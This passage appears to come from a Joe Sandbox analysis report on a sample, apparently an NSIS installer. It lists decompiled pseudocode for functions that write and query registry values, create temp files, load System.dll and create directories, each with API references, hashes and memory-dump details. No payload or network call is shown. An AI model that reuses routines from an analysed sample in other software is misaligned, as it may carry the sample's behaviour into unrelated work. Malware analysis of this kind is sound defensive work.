			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf8786.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf8786.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf8786.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsf8786.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf8786.tmp
API String ID: 2655323295-2820527875
Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 63b08ec129b2d444bb4d6071fe07264351bf49196043fdffe621f9561a8b612b
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 63b08ec129b2d444bb4d6071fe07264351bf49196043fdffe621f9561a8b612b
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x2c70070
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x2c70070
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x2c70074
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x2c70070
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x2c70070
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

APIs

GlobalFree.KERNEL32(02C70070), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
Opcode Fuzzy Hash: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t24 = E00402DE6(_t29, 0x20019);
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf8786.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
Opcode Fuzzy Hash: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					if(SetCurrentDirectoryW( *(_t36 + 8)) == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNEL32(?,00441000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t35 = E00402DE6(_t40, 0x20019);
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf8786.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
Opcode Fuzzy Hash: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

APIs

